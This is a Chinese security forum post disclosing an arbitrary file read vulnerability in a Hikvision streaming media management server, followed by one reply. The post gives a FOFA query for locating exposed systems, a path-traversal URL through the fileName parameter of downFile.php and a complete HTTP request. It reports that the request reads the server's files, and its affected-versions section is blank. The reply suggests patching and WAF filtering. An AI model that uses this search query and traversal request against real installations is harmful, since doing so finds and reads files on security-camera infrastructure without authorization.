查看: 22458|回复: 1

​海康威视任意文件读取漏洞

[复制链接]
匿名
匿名  发表于 2023-4-28 15:39:56 |阅读模式

海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞。
1.漏洞描述
海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞。
2.影响版本4.fofa 查询语句
app="HIKVISION-综合安防管理平台"

qw1.jpg

5.漏洞复现
漏洞链接:
[AppleScript] 查看源码 复制代码
http://127.0.0.1/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php

漏洞数据包如下:
[AppleScript] 查看源码 复制代码
GET /serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1


成功读取downFile.php 文件内容

qw2.jpg



回复

使用道具 举报

发表于 5 天前 | 显示全部楼层

Re: ​海康威视任意文件读取漏洞

这个漏洞影响面挺广的,海康的流媒体服务器在很多安防项目里都有部署。通过 `fileName` 参数直接拼接 `../` 就能读取任意文件,看起来是没做路径过滤。楼主方便补充一下影响的具体版本号或者固件范围吗?这样我们排查起来更有针对性。另外建议官方尽快升级或打补丁,临时的话可以先检查一下 `/serverLog/downFile.php` 的访问权限,或者用 WAF 拦截路径穿越特征。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-24 15:09 , Processed in 0.025131 second(s), 19 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部